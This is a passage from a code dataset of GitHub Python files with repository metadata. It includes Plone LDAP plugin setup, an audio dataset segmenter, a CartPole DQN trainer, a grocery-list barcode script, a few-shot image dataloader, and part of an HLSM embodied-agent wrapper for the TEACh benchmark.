local_groups=0,\n users_base='ou=users,ou=upcnet,dc=upcnet,dc=es', users_scope=2,\n roles='Authenticated,Member', groups_base='ou=groups,ou=upcnet,dc=upcnet,dc=es',\n groups_scope=2, read_only=True, binduid='cn=ldap,ou=upcnet,dc=upcnet,dc=es', bindpwd=LDAP_PASSWORD,\n rdn_attr='cn', LDAP_server='ldap.upcnet.es', encryption='SSHA')\n portal.acl_users.ldapexterns.acl_users.manage_edit('ldapexterns', 'cn', 'cn', 'ou=users,ou=upcnet,dc=upcnet,dc=es', 2, 'Authenticated,Member',\n 'ou=groups,ou=upcnet,dc=upcnet,dc=es', 2, 'cn=ldap,ou=upcnet,dc=upcnet,dc=es', LDAP_PASSWORD, 1, 'cn',\n 'top,person,inetOrgPerson', 0, 0, 'SSHA', 0, '')\n\n plugin = portal.acl_users['ldapexterns']\n\n # Activate plugins (all)\n plugin.manage_activateInterfaces(['IAuthenticationPlugin',\n 'ICredentialsResetPlugin',\n 'IGroupEnumerationPlugin',\n 'IGroupIntrospection',\n 'IGroupManagement',\n 'IGroupsPlugin',\n 'IUserAdderPlugin',\n 'IUserEnumerationPlugin',\n 'IUserManagement',\n 'IPropertiesPlugin',\n 'IRoleEnumerationPlugin',\n 'IRolesPlugin'])\n\n # In case to have more than one server for fault tolerance\n # LDAPUserFolder.manage_addServer(portal.acl_users.ldapUPC.acl_users, \"ldap.upc.edu\", '636', use_ssl=1)\n\n # Redefine some schema properties\n LDAPUserFolder.manage_deleteLDAPSchemaItems(portal.acl_users.ldapexterns.acl_users, ldap_names=['sn'], REQUEST=None)\n LDAPUserFolder.manage_deleteLDAPSchemaItems(portal.acl_users.ldapexterns.acl_users, ldap_names=['cn'], REQUEST=None)\n LDAPUserFolder.manage_addLDAPSchemaItem(portal.acl_users.ldapexterns.acl_users, ldap_name='sn', friendly_name='Last Name', public_name='fullname')\n LDAPUserFolder.manage_addLDAPSchemaItem(portal.acl_users.ldapexterns.acl_users, ldap_name='cn', friendly_name='Canonical Name')\n\n # Update the preference of the plugins\n portal.acl_users.plugins.movePluginsUp(IUserAdderPlugin, ['ldapexterns'])\n portal.acl_users.plugins.movePluginsUp(IGroupManagement, ['ldapexterns'])\n\n # Move the ldapUPC to the top of the active plugins.\n # Otherwise member.getProperty('email') won't work properly.\n # from Products.PluggableAuthService.interfaces.plugins import IPropertiesPlugin\n # portal.acl_users.plugins.movePluginsUp(IPropertiesPlugin, ['ldapUPC'])\n # portal.acl_users.plugins.manage_movePluginsUp('IPropertiesPlugin', ['ldapUPC'], context.REQUEST.RESPONSE)\n # except:\n # pass\n\n # Add LDAP plugin cache\n plugin = portal.acl_users['ldapexterns']\n plugin.ZCacheable_setManagerId('RAMCache')\n\n #Configuracion por defecto de los grupos de LDAP de externs\n groups_query = u'(&(objectClass=groupOfUniqueNames))'\n user_groups_query = u'(&(objectClass=groupOfUniqueNames)(uniqueMember=%s))'\n api.portal.set_registry_record('genweb.controlpanel.core.IGenwebCoreControlPanelSettings.groups_query', groups_query)\n api.portal.set_registry_record('genweb.controlpanel.core.IGenwebCoreControlPanelSettings.user_groups_query', user_groups_query)\n return 'Done. groupOfUniqueNames in LDAP Controlpanel Search'\n\n\nclass setupLDAP(grok.View):\n \"\"\" Configure basic LDAP for Plone instance \"\"\"\n grok.context(IPloneSiteRoot)\n grok.require('zope2.ViewManagementScreens')\n\n def render(self):\n portal = getSite()\n ldap_name = self.request.form.get('ldap_name', 'ldap')\n ldap_server = self.request.form.get('ldap_server')\n branch_name = self.request.form.get('branch_name')\n base_dn = self.request.form.get('base_dn')\n branch_admin_cn = self.request.form.get('branch_admin_cn')\n branch_admin_password = self.request.form.get('branch_admin_password')\n allow_manage_users = self.request.form.get('allow_manage_users', False)\n\n users_base = 'ou=users,ou={},{}'.format(branch_name, base_dn)\n groups_base = 'ou=groups,ou={},{}'.format(branch_name, base_dn)\n bind_uid = 'cn={},ou={},{}'.format(branch_admin_cn, branch_name, base_dn)\n\n # Delete if exists\n if getattr(portal.acl_users, ldap_name, None):\n portal.acl_users.manage_delObjects('ldapUPC')\n\n manage_addPloneLDAPMultiPlugin(\n portal.acl_users, ldap_name,\n use_ssl=1, login_attr='cn', uid_attr='cn', local_groups=0,\n rdn_attr='cn', encryption='SSHA', read_only=True,\n roles='Authenticated,Member', groups_scope=2, users_scope=2,\n title=ldap_name,\n LDAP_server=ldap_server,\n users_base=users_base,\n groups_base=groups_base,\n binduid=bind_uid,\n bindpwd=branch_admin_password)\n\n ldap_acl_users = getattr(portal.acl_users, ldap_name).acl_users\n ldap_acl_users.manage_edit(\n ldap_name, 'cn', 'cn', users_base, 2, 'Authenticated,Member',\n groups_base, 2, bind_uid, branch_admin_password, 1, 'cn',\n 'top,person,inetOrgPerson', 0, 0, 'SSHA', 0, '')\n\n plugin = portal.acl_users[ldap_name]\n\n active_plugins = [\n 'IAuthenticationPlugin', 'ICredentialsResetPlugin', 'IGroupEnumerationPlugin',\n 'IGroupIntrospection', 'IGroupManagement', 'IGroupsPlugin',\n 'IPropertiesPlugin', 'IRoleEnumerationPlugin', 'IRolesPlugin',\n 'IUserAdderPlugin', 'IUserEnumerationPlugin']\n\n if allow_manage_users:\n active_plugins.append('IUserManagement')\n\n plugin.manage_activateInterfaces(active_plugins)\n\n # Redefine some schema properties\n\n LDAPUserFolder.manage_deleteLDAPSchemaItems(ldap_acl_users, ldap_names=['sn'], REQUEST=None)\n LDAPUserFolder.manage_deleteLDAPSchemaItems(ldap_acl_users, ldap_names=['cn'], REQUEST=None)\n LDAPUserFolder.manage_addLDAPSchemaItem(ldap_acl_users, ldap_name='sn', friendly_name='Last Name', public_name='fullname')\n LDAPUserFolder.manage_addLDAPSchemaItem(ldap_acl_users, ldap_name='cn', friendly_name='Canonical Name')\n\n # Update the preference of the plugins\n portal.acl_users.plugins.movePluginsUp(IUserAdderPlugin, [ldap_name])\n portal.acl_users.plugins.movePluginsUp(IGroupManagement, [ldap_name])\n\n # Add LDAP plugin cache\n plugin = portal.acl_users[ldap_name]\n plugin.ZCacheable_setManagerId('RAMCache')\n return 'Done.'\n","repo_name":"UPCnet/genweb.core","sub_path":"genweb/core/browser/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":12816,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71889144873","text":"import numpy as np\nimport pandas as pd\nimport os\nimport sys\nimport argparse\n\nfrom tqdm import tqdm\nfrom glob import glob\nfrom pathlib import PurePath\n\nimport vxs\n\ndef save_segments(ds, pdir):\n os.makedirs(pdir, exist_ok=True)\n cls_counters = {}\n for i in tqdm(range(len(ds)), 'Segments'):\n segm, cl = ds[i]\n try:\n cl_i = cls_counters[cl]\n except KeyError:\n cls_counters[cl] = 0\n cl_i = 0\n segm.save((pdir + f'/{cl}_{cl_i}.wav'))\n cls_counters[cl] += 1\n\ndef cut_beatboxset1(root, savedir, anno_type):\n ds = vxs.Beatbox1TrackSet(root, annotation_type=anno_type)\n for track, annotation in tqdm(ds.annotated_tracks(), 'Tracks'):\n person = PurePath(track.filepath).stem.split('_')[1]\n pdir = str(savedir / person)\n segments = vxs.cut_track_into_segments(\n track, annotation, classes=vxs.constants.ANNOTATION_CLASSES['beatboxset1'])\n save_segments(segments, pdir)\n\ndef cut_avp(root, savedir, subset):\n subset_dir = savedir / subset.lower()\n subset_root = root / subset\n os.makedirs(subset_dir, exist_ok=True)\n\n participants = sorted([\n int(PurePath(p).stem.split('_')[1])\n for p in glob(str(subset_root / 'Participant_*'))\n ])\n\n savedir_f = str(subset_dir / 'participant_{}')\n\n for p in tqdm(participants, 'Participants'):\n ds = vxs.SegmentSet(\n vxs.AVPTrackSet(root, subset=subset, participant=p, recordings_type='hits'),\n frame_window=None)\n pdir = savedir_f.format(p)\n save_segments(ds, pdir)\n\nENST_DRUM_TYPES = {\n 'hi-hat': ['chh', 'ohh'],\n 'kick': ['bd'],\n 'snare': ['sd', 'sd-'],\n}\n \ndef cut_enst(root, savedir):\n for audio_type, fit_classes in ENST_DRUM_TYPES.items():\n pdir = str(savedir / audio_type)\n print(f'Extracting {audio_type}')\n ds = vxs.ENSTDrumsTrackSet(root, audio_type=audio_type)\n for track, anno in tqdm(ds.annotated_tracks(), 'Tracks'):\n anno = anno[anno['class'].isin(fit_classes)].reset_index()\n segments = vxs.cut_track_into_segments(track, anno)\n save_segments(segments, pdir)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Cut beatbox dataset into chunks')\n parser.add_argument('type', choices=['avp', 'beatboxset1', 'enst'], type=str,\n help='Type of input dataset')\n parser.add_argument('root', metavar='AVP_ROOT', type=PurePath,\n help='Dataset root directory')\n parser.add_argument('save_dir', metavar='SAVE_DIR', type=PurePath,\n help='Directory to save output files')\n parser.add_argument('--subset', choices=['Fixed', 'Personal'], type=str,\n required='avp' in sys.argv,\n help='Subset of AVP to choose from')\n parser.add_argument('--anno_type', choices=['DR', 'HT'], type=str,\n required='beatboxset1' in sys.argv,\n help='Type of annotations for beatboxset1 to use')\n\n args = parser.parse_args()\n if args.type == 'avp':\n cut_avp(args.root, args.save_dir, args.subset)\n elif args.type == 'beatboxset1':\n cut_beatboxset1(args.root, args.save_dir, args.anno_type)\n elif args.type == 'enst':\n cut_enst(args.root, args.save_dir)\n","repo_name":"flyingleafe/vxs-vpt","sub_path":"scripts/cut_dataset.py","file_name":"cut_dataset.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"31734593644","text":"import gym\nfrom CartPole.DQN import DQN\n\n# Hyperparameters\nlearning_rate = 0.001\ndiscount_factor = 0.95\nexploration = 1.0\n\n# Training parameters\nEPISODES = 50000\nSTEPS = 1000\n\nif __name__ == '__main__':\n # The problem to solve\n env = gym.make('CartPole-v1')\n\n # The agent that solves it\n DQN = DQN(env.observation_space.shape[0], # State's dimensions\n env.action_space.n, # Number of available actions\n learning_rate,\n discount_factor,\n exploration)\n\n for e in range(EPISODES):\n state = env.reset()\n total_reward = 0\n\n for t in range(STEPS):\n action = DQN.act(state)\n\n if e > 500:\n env.render()\n\n next_state, reward, done, _ = env.step(action)\n\n DQN.add_to_memory((state, action, next_state, reward, done))\n\n total_reward += reward\n\n if done:\n print('Episode: {}'.format(e),\n 'Total reward: {}'.format(total_reward),\n 'Explore P: {:.4f}'.format(DQN.epsilon))\n state = env.reset()\n total_reward = 0\n else:\n state = next_state\n\n DQN.replay(32) # Experience replay with a batch of 32 samples\n","repo_name":"robrav01/TFG-RLDL","sub_path":"CartPole/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73402669994","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\n\n# Load the CSV file\ndf = pd.read_csv(\"a.csv\")\n\n# Set the color palette\ncolors = sns.color_palette('pastel')[0:len(df.columns)]\n\n# For each column, create a pie chart\nfor i, column in enumerate(df.columns):\n fig, ax = plt.subplots(figsize=(10, 10), dpi=100) # Set larger size and dpi\n df[column].value_counts().plot(\n kind=\"pie\",\n ax=ax,\n autopct=\"%1.1f%%\",\n startangle=90,\n colors=colors,\n )\n ax.set_ylabel(\"\")\n plt.title(column)\n plt.savefig(\n f\"out/{column}_pie_chart.png\", dpi=100, transparent=True\n )\n plt.close(fig)\n","repo_name":"TruncatedDinoSour/annual-school-project-23-24","sub_path":"scripts/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35693356447","text":"import requests\nimport json\n\n\ndef get_item_by_upc(upc):\n url = f\"https://shop.wegmans.com/api/v2/store_products?allow_autocorrect=true&limit=60&offset=0&search_provider=buffet&search_term={upc}&secondary_results=false&sort=rank\"\n\n payload = {}\n headers = {\n 'cookie': open('cookie.txt', 'r').read()\n }\n\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n\n item = json.loads(response.text)['items'][0]\n print(item)\n if response.status_code != 200:\n pushbullet_message(\"Wegmans\", f\"Failed to get item with UPC: {upc}\")\n return item\n\n\ndef add_item_by_upc(upc):\n item = get_item_by_upc(upc)\n url = \"https://shop.wegmans.com/api/v2/user_lists/default\"\n headers = {\n 'cookie': open('cookie.txt', 'r').read()\n }\n\n payload_json = json.loads('{\"discount_total\":\"0.0\",\"href\":\"/user_lists/default\",\"id\":\"31368411\",\"ids\":{\"grocery\":\"194098\"},\"item_count\":1,\"items\":[{\"id\":\"' + str(item['id']) + '\",\"quantity\":1,\"order_by_weight\":false,\"product_config\":null,\"item_type\":\"store_product\"}],\"modified\":\"2021-06-01T20:05:09.569597+00:00\",\"name\":\"default\",\"offer_progress\":[],\"offer_total\":\"0\",\"points\":{\"awarded\":0},\"pre_discount_product_total\":\"22.26\",\"product_total\":\"22.26\"}')\n payload_json['items'][0]['store_product'] = item\n response = requests.request(\"PUT\", url, headers=headers, json=payload_json)\n print(response.text)\n if response.status_code != 200:\n pushbullet_message(\"Wegmans\", f\"Failed to add item to list: {item['name']}\")\n else:\n pushbullet_message(\"Wegmans\", f\"Added item to list: {item['name']}\")\n\n\ndef pushbullet_message(title, body):\n msg = {\"type\": \"note\", \"title\": title, \"body\": body}\n TOKEN = open('pushbullet.txt', 'r').read()\n resp = requests.post('https://api.pushbullet.com/v2/pushes',\n data=json.dumps(msg),\n headers={'Authorization': 'Bearer ' + TOKEN,\n 'Content-Type': 'application/json'})\n if resp.status_code != 200:\n raise Exception('Error', resp.status_code)\n else:\n print('Message sent')\n\n\nif __name__ == '__main__':\n while True:\n add_item_by_upc(input(\"Enter UPC: \"))\n\n","repo_name":"paulhulbert/WegmansGroceryListBarcodeScanner","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2182372011","text":"##### from cross attention network https://github.com/blue-blue272/fewshot-CAN\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\nfrom torch.utils.data import DataLoader\n\nimport transforms as T\nimport mini_dataset\nimport sampler.mini_sampler_test as sample_test\nimport sampler.mini_sampler_train as sample_train\n\nclass DataManager(object):\n \"\"\"\n Few shot data manager\n \"\"\"\n def __init__(self, args, use_gpu):\n super(DataManager, self).__init__()\n self.args = args\n self.use_gpu = use_gpu\n\n print(\"Initializing dataset {}\".format(args.dataset))\n dataset = mini_dataset.miniImageNet_load()\n transform_train = T.Compose([\n T.RandomCrop(84, padding=8),\n T.RandomHorizontalFlip(),\n T.ToTensor(),\n T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n\n ])\n transform_test = T.Compose([\n T.ToTensor(),\n T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ])\n\n pin_memory = True if use_gpu else False\n\n self.trainloader = DataLoader(\n sample_train.FewShotDataset_train(name='train_loader',\n dataset=dataset.train,\n labels2inds=dataset.train_labels2inds,\n labelIds=dataset.train_labelIds,\n nKnovel=args.nKnovel,\n nExemplars=args.nExemplars,\n nTestNovel=args.train_nTestNovel,\n epoch_size=args.train_epoch_size,\n transform=transform_train,\n load=args.load,\n ),\n batch_size=args.train_batch, shuffle=True, num_workers=args.workers,\n pin_memory=pin_memory, drop_last=True,\n )\n self.testloader = DataLoader(\n sample_test.FewShotDataset_test(name='test_loader',\n dataset=dataset.test,\n labels2inds=dataset.test_labels2inds,\n labelIds=dataset.test_labelIds,\n nKnovel=args.nKnovel,\n nExemplars=args.nExemplars,\n nTestNovel=args.nTestNovel,\n epoch_size=args.epoch_size,\n transform=transform_test,\n load=args.load,\n ),\n batch_size=args.test_batch, shuffle=False, num_workers=args.workers,\n pin_memory=pin_memory, drop_last=False,\n )\n def return_dataloaders(self):\n return self.trainloader, self.testloader\n","repo_name":"corwinliu9669/Learning-a-Few-shot-Embedding-Model-with-Contrastive-Learning","sub_path":"mini_dataloader.py","file_name":"mini_dataloader.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"72"} +{"seq_id":"18042800309","text":"import sys\nsys.path.append(\"/home/ubuntu/efs/teach/src/teach/modeling/hlsm\")\nimport pdb\nfrom pathlib import Path\nfrom typing import List\nimport argparse\nimport os\nimport json\nimport copy\nimport numpy as np\nimport torch\nfrom collections import Counter, OrderedDict\nfrom teach.modeling.hlsm.teach import constants\nfrom teach.modeling.hlsm.teach.data.zoo.guides_edh import GuidesEdhDataset\nfrom teach.modeling.hlsm.teach.data.preprocessor import Preprocessor\nfrom teach.modeling.hlsm.teach.utils import data_util, eval_util, model_util\nfrom teach.dataset.definitions import Definitions\nfrom teach.inference.actions import obj_interaction_actions\nfrom teach.inference.teach_model import TeachModel\nfrom teach.logger import create_logger\nfrom lgp.models.alfred.hlsm.alfred_perception_model import AlfredSegmentationAndDepthModel\nfrom lgp.env.alfred.alfred_observation import AlfredObservation\nfrom teach.modeling.hlsm.lgp.agents.agents import get_agent\nimport teach.modeling.hlsm.lgp.parameters as parameters\nfrom lgp.models.teach.hlsm.hlsm_task_repr import HlsmTaskRepr\nfrom lgp.rollout.rollout_actor import RolloutActorLocal\nfrom lgp.env.alfred.alfred_env import AlfredEnv\nfrom lgp import paths\n\nfrom lgp.env.alfred.state_tracker import PoseInfo, InventoryInfo\nfrom lgp.env.privileged_info import PrivilegedInfo\n\nfrom teach.dataset.task_THOR import Task_THOR\n\n\nlogger = create_logger(__name__)\n\nclass ForkedPdb(pdb.Pdb):\n \"\"\"A Pdb subclass that may be used\n from a forked multiprocessing child\n\n \"\"\"\n def interaction(self, *args, **kwargs):\n _stdin = sys.stdin\n try:\n sys.stdin = open('/dev/stdin')\n pdb.Pdb.interaction(self, *args, **kwargs)\n finally:\n sys.stdin = _stdin\n\nclass HLSM_MODEL(TeachModel):\n \"\"\"\n Wrapper around HLSM Model for inference\n \"\"\"\n\n def __init__(self, process_index: int, num_processes: int, model_args: List[str]):\n \"\"\"Constructor\n\n :param process_index: index of the eval process that launched the model\n :param num_processes: total number of processes launched\n :param model_args: extra CLI arguments to teach_eval will be passed along to the model\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--seed\", type=int, default=1, help=\"Random seed\")\n parser.add_argument(\"--device\", type=str, default=\"cuda\", help=\"cpu or cuda\")\n parser.add_argument(\"--model_dir\", type=str, required=True, help=\"Model folder name under $ET_LOGS\")\n parser.add_argument(\"--checkpoint\", type=str, default=\"latest.pth\", help=\"latest.pth or model_**.pth\")\n parser.add_argument(\"--subgoal_model_file\", type=str, default=\"alfred_hlsm_subgoal_model_e5.pytorch\", help=\"Path to subgoal model checkpoint\")\n parser.add_argument(\"--depth_model_file\", type=str, default=\"hlsm_depth_model_e3.pytorch\", help=\"Path to depth model checkpoint\")\n parser.add_argument(\"--seg_model_file\", type=str, default=\"hlsm_segmentation_model_e4.pytorch\", help=\"Path to segmentation model checkpoint\")\n parser.add_argument(\"--navigation_model_file\", type=str, default=\"hlsm_gofor_navigation_model_e5.pytorch\", help=\"Path to navigation model checkpoint\")\n parser.add_argument(\"--experirment_def_name\", type=str, default=\"\", help=\"Name of the experiment to run\")\n parser.add_argument(\n \"--skip_edh_history\",\n action=\"store_true\",\n default=False,\n help=\"Specify this to ignore actions and image frames in EDH history\",\n )\n\n args = parser.parse_args(model_args)\n args.dout = args.model_dir\n self.args = args\n\n logger.info(\"HLSM using args %s\" % str(args))\n np.random.seed(args.seed)\n\n self.object_predictor = None\n self.model = None\n self.extractor = None\n self.vocab = None\n self.preprocessor = None\n\n self.input_dict = None\n self.cur_edh_instance = None\n #ForkedPdb().set_trace()\n self.exp_def = parameters.Hyperparams(parameters.load_experiment_definition(self.args.experirment_def_name))\n parameters.EXPERIMENT_DEFINITION = self.exp_def\n self.set_up_model(process_index)\n device = torch.device(self.exp_def.Setup.device)\n self.latest_extra_events = []\n self.smooth_nav = self.exp_def.Setup.env_setup.d.get(\"smooth_nav\")\n self.fail_count = 0\n self.max_fails = 10\n self.counter = 0\n\n # self.env = AlfredEnv(device=device,\n # setup=self.exp_def.Setup.env_setup.d,\n # hparams=self.exp_def.Hyperparams.d)\n # from teach.settings import get_settings\n # from teach.simulators.simulator_THOR import COMMIT_ID, TEAChController\n #self.env = TEAChController(base_dir=get_settings().AI2THOR_BASE_DIR, download_only=True, commit_id=COMMIT_ID)\n\n\n\n # def load_checkpoint(self, checkpoint_file, model_file):\n # model_state = torch.load(model_file)\n # checkpoint = torch.load(checkpoint_file)\n # nonbert_optimizer_state = checkpoint[\"nonbert_optimizer\"]\n # bert_optimizer_state = checkpoint[\"bert_optimizer\"]\n # epoch = checkpoint[\"epoch\"]\n # iter = checkpoint[\"iter\"]\n # return (nonbert_optimizer_state, bert_optimizer_state), model_state, epoch, iter\n\n def set_up_model(self, process_index):\n\n os.makedirs(self.args.dout, exist_ok=True)\n model_path = os.path.join(self.args.model_dir, self.args.checkpoint)\n logger.info(\"Loading model from %s\" % model_path)\n logger.info(f\"Loading model agent using device: {self.args.device}\")\n agent = get_agent(self.exp_def.Setup, self.exp_def.Hyperparams, self.args.device, self.exp_def)\n self.model = agent\n self.PERCEPTION_DEVICE = \"cuda\"\n self.depth_model = AlfredSegmentationAndDepthModel(self.exp_def.Hyperparams).to(self.PERCEPTION_DEVICE)\n depth_model_path = self.exp_def.Setup.agent_setup.depth_model_file\n depth_model_path = os.path.join(paths.MODEL_PATH, depth_model_path)\n self.depth_model.load_state_dict(torch.load(depth_model_path))\n self.depth_model.eval()\n self.seg_model = AlfredSegmentationAndDepthModel(self.exp_def.Hyperparams).to(self.PERCEPTION_DEVICE)\n seg_model_path = self.exp_def.Setup.agent_setup.seg_model_file\n seg_model_path = os.path.join(paths.MODEL_PATH, seg_model_path)\n self.seg_model.load_state_dict(torch.load(seg_model_path))\n self.seg_model.eval()\n self.latest_observation = None\n self.latest_action = None\n self.fov = 60\n self.steps = 0\n self.device = None\n return agent\n\n def get_rollout_actor(self, ):\n self.rollout_actor = RolloutActorLocal(experiment_name=exp_name,\n agent=self.agent,\n env=env,\n dataset_proc=None,\n param_server_proc=None,\n max_horizon=horizon,\n dataset_device=dataset_device,\n index=1,\n collect_trace=visualize_rollouts,\n lightweight_mode=not visualize_rollouts)\n\n def _extract_reference_semantic_image(self, event):\n num_objects = segdef.get_num_objects()\n h, w = event.frame.shape[0:2]\n seg_image = torch.zeros([num_objects, h, w], dtype=torch.int16, device=device)\n\n inventory_obj_strs = set()\n for object in event.metadata['inventoryObjects']:\n inventory_obj_string = object['objectType'].split(\"_\")[0]\n inventory_obj_strs.add(inventory_obj_string)\n\n for obj_str, class_mask in event.class_masks.items():\n obj_int = segdef.object_string_to_intid(obj_str)\n class_mask_t = torch.from_numpy(class_mask.astype(np.int16)).to(device)\n seg_image[obj_int] = torch.max(seg_image[obj_int], class_mask_t)\n return seg_image.type(torch.ByteTensor)\n\n def _make_observation(self):\n\n event = self.latest_event\n if event.frame is not None:\n rgb_image = torch.from_numpy(event.frame.copy()).permute((2, 0, 1)).unsqueeze(0).half() / 255\n else:\n rgb_image = torch.zeros((1, 3, 300, 300))\n # Depth\n if self.exp_def.Setup.env_setup.d.get(\"reference_depth\"):\n depth_image = torch.from_numpy(event.depth_frame.copy()).unsqueeze(0).unsqueeze(0) / 1000\n else:\n _, pred_depth = self.depth_model.predict(rgb_image.float().to(self.PERCEPTION_DEVICE))\n depth_image = pred_depth.to(\"cpu\") # TODO: Maybe skip this? We later move it to GPU anyway\n\n # Segmentation\n if self.exp_def.Setup.env_setup.d.get(\"reference_segmentation\"):\n semantic_image = self._extract_reference_semantic_image(event)\n semantic_image = semantic_image.unsqueeze(0)\n else:\n pred_seg, _ = self.seg_model.predict(rgb_image.float().to(self.PERCEPTION_DEVICE))\n semantic_image = pred_seg\n\n # Simple error detection from RGB image changes\n action_failed = False\n if self.latest_observation is not None:\n assert self.latest_action is not None, \"Didn't log an action, but got two observations in a row?\"\n rgb_diff = (rgb_image - self.latest_observation.rgb_image).float().abs().mean()\n if rgb_diff < 1e-4:\n print(f\"Action: {self.latest_action}, RGB Diff: {rgb_diff}. Counting as failed.\")\n action_failed = True\n else:\n pass\n\n if not action_failed and self.latest_action is not None:\n self.pose_info.simulate_successful_action(self.latest_action)\n oinv = copy.deepcopy(self.inventory_info)\n self.inventory_info.simulate_successful_action(self.latest_action, self.latest_observation)\n if len(oinv.inventory_object_ids) != len(self.inventory_info.inventory_object_ids):\n print(self.inventory_info.summarize())\n\n # Pose\n if self.exp_def.Setup.env_setup.d.get(\"reference_pose\"):\n self.pose_info = PoseInfo.from_ai2thor_event(event)\n\n T_world_to_cam = self.pose_info.get_pose_mat()\n cam_horizon_deg = [self.pose_info.cam_horizon_deg]\n agent_pos = self.pose_info.get_agent_pos()\n\n # Inventory\n if self.exp_def.Setup.env_setup.d.get(\"reference_inventory\"):\n self.inventory_info = InventoryInfo.from_ai2thor_event(event)\n inventory_vector = self.inventory_info.get_inventory_vector()\n inventory_vector = inventory_vector.unsqueeze(0)\n\n privileged_info = PrivilegedInfo(event)\n\n observation = AlfredObservation(rgb_image,\n depth_image,\n semantic_image,\n inventory_vector,\n T_world_to_cam,\n self.fov,\n cam_horizon_deg,\n privileged_info)\n observation.set_agent_pos(agent_pos)\n if action_failed:\n observation.set_error_causing_action(self.latest_action)\n\n # Add extra RGB frames from smooth navigation\n if self.latest_extra_events:\n extra_frames = [torch.from_numpy(e.frame.copy()).permute((2, 0, 1)).unsqueeze(0).half() / 255 for e in self.latest_extra_events]\n observation.extra_rgb_frames = extra_frames\n task = None\n\n return observation\n\n\n def reset(self, event):\n # First reset everything\n self.latest_event = event\n self.first_event = event\n self.latest_action = None\n self.latest_observation = None\n\n # Initialize pose and inventory\n if self.exp_def.Setup.env_setup.d.get(\"reference_pose\"):\n self.pose_info = PoseInfo.from_ai2thor_event(event)\n else:\n self.pose_info = PoseInfo.create_new_initial()\n\n if self.exp_def.Setup.env_setup.d.get(\"reference_inventory\"):\n self.inventory_info = InventoryInfo.from_ai2thor_event(event)\n else:\n self.inventory_info = InventoryInfo.create_empty_initial()\n\n # Make the first observation\n self.latest_observation = copy.deepcopy(self._make_observation())\n return self.latest_observation\n\n\n def start_new_edh_instance(self, original_edh_instance, edh_instance, edh_history_images, simulator, task, instance_file, game_file, edh_name=None):\n\n game = json.load(open(game_file, \"r\"))\n event = simulator.controller.last_event\n observation = self.reset(event)\n self.model.start_new_rollout(task)\n self.task = task\n self.game = game\n\n\n return True\n\n\n def to_thor_api_exec(self, action, simulator, object_id=\"\", smooth_nav=False, debug_print_all_sim_steps=True):\n # TODO: parametrized navigation commands\n print(action)\n if action in [\"Forward\", \"MoveAhead\", \"Move Ahead\"]:\n ac = dict(action=\"MoveAhead\", forceAction=True)\n if debug_print_all_sim_steps:\n logger.info(\"step %s\", ac)\n e = simulator.controller.step(ac)\n elif action in [\"Backward\", \"MoveBack\", \"Move Back\"]:\n ac = dict(action=\"MoveBack\", forceAction=True)\n if debug_print_all_sim_steps:\n logger.info(\"step %s\", ac)\n e = simulator.controller.step(ac)\n elif action in [\"Look Up\", \"LookUp\"]:\n ac = dict(action=\"LookUp\", forceAction=True)\n if debug_print_all_sim_steps:\n logger.info(\"step %s\", ac)\n e = simulator.controller.step(ac)\n elif action in [\"Look Down\", \"LookDown\"]:\n ac = dict(action=\"LookDown\", forceAction=True)\n if debug_print_all_sim_steps:\n logger.info(\"step %s\", ac)\n e = simulator.controller.step(ac)\n elif action in [\"Turn Left\", \"TurnLeft\", \"RotateLeft\", \"Rotate Left\"]:\n ac = dict(action=\"RotateLeft\", forceAction=True)\n if debug_print_all_sim_steps:\n logger.info(\"step %s\", ac)\n e = simulator.controller.step(ac)\n elif action in [\"Turn Right\", \"TurnRight\", \"RotateRight\", \"Rotate Right\"]:\n ac = dict(action=\"RotateRight\", forceAction=True)\n if debug_print_all_sim_steps:\n logger.info(\"step %s\", ac)\n e = simulator.controller.step(ac)\n elif action in [\"Pan Left\", \"PanLeft\", \"MoveLeft\", \"Move Left\"]: # strafe left\n ac = dict(action=\"MoveLeft\", forceAction=True)\n if debug_print_all_sim_steps:\n logger.info(\"step %s\", ac)\n e = simulator.controller.step(ac)\n elif action in [\"Pan Right\", \"PanRight\", \"MoveRight\", \"Move Right\"]: # strafe right\n ac = dict(action=\"MoveRight\", forceAction=True)\n if debug_print_all_sim_steps:\n logger.info(\"step %s\", ac)\n e = simulator.controller.step(ac)\n elif action == \"Stop\": # do nothing\n ac = dict(action=\"Pass\")\n if debug_print_all_sim_steps:\n logger.info(\"step %s\", ac)\n e = simulator.controller.step(ac)\n else:\n logger.warning(\"%s: Motion not supported\" % action)\n interaction.action.success = 0\n return False, \"\", None\n\n return e, action\n\n\n def _error_is_fatal(self, err):\n self.fail_count += 1\n if self.fail_count >= self.max_fails:\n print(f\"EXCEEDED MAXIMUM NUMBER OF FAILURES ({self.max_fails})\")\n return True\n else:\n return False\n\n def prune_by_any_interaction(self, simulator, instances_ids):\n '''\n ignores any object that is not interactable in anyway\n '''\n pruned_instance_ids = []\n for obj in simulator.controller.last_event.metadata['objects']:\n obj_id = obj['objectId']\n if obj_id in instances_ids:\n if obj['pickupable'] or obj['receptacle'] or obj['openable'] or obj['toggleable'] or obj['sliceable']:\n pruned_instance_ids.append(obj_id)\n\n ordered_instance_ids = [id for id in instances_ids if id in pruned_instance_ids]\n return ordered_instance_ids\n\n def va_interact(self, action, simulator, interact_mask=None, 